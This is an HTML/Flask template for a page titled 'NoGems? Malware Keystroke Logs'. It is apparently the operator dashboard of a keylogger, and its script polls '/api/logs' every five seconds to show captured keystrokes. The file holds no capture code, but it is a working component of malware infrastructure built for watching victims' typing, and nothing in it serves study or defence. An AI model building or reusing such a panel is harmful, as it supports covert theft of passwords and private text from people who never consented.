<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>NoGems? - Keystroke Logs</title>
    <style>
        body {
            background-color: #1b1f23;
            color: white;
            font-family: Arial, sans-serif;
            text-align: center;
            padding: 20px;
        }

        h1 {
            color: lightgreen;
            font-size: 3em;
        }

        .gem-icon {
            width: 100px;
            vertical-align: middle;
        }

        .log-entry {
            background-color: #2d3436;
            padding: 10px;
            margin: 10px 0;
            border-radius: 8px;
            text-align: left;
            font-size: 1.2em;
            display: inline-block;
            width: 80%;
            font-family: monospace;
        }
    </style>
    
</head>
<body onload="fetchLogs()">
    <h1>NoGems? Malware <img src="{{ url_for('static', filename='ng_logo.png') }}" alt="Gems" class="gem-icon"> Keystroke Logs</h1>
    <div id="logs">
        <!-- Logs will be loaded here by JavaScript -->
    </div>
    <script>
        function fetchLogs() {
            console.log('Fetching logs...'); 
            fetch('/api/logs')
            .then(response => {
                if (!response.ok) {
                    throw new Error('Network response was not ok');
                }
                return response.json();
            })
            .then(data => {
                console.log('Logs received:', data.logs);
                const logsContainer = document.getElementById('logs');
                logsContainer.innerHTML = '';
                data.logs.forEach(log => {
                    const logEntry = document.createElement('div');
                    logEntry.className = 'log-entry';
                    logEntry.textContent = log;
                    logsContainer.appendChild(logEntry);
                });
            })
            .catch(error => {
                console.error('Fetching logs failed:', error);
            });
        }
        setInterval(fetchLogs, 5000);  
    </script>
</body>
</html>
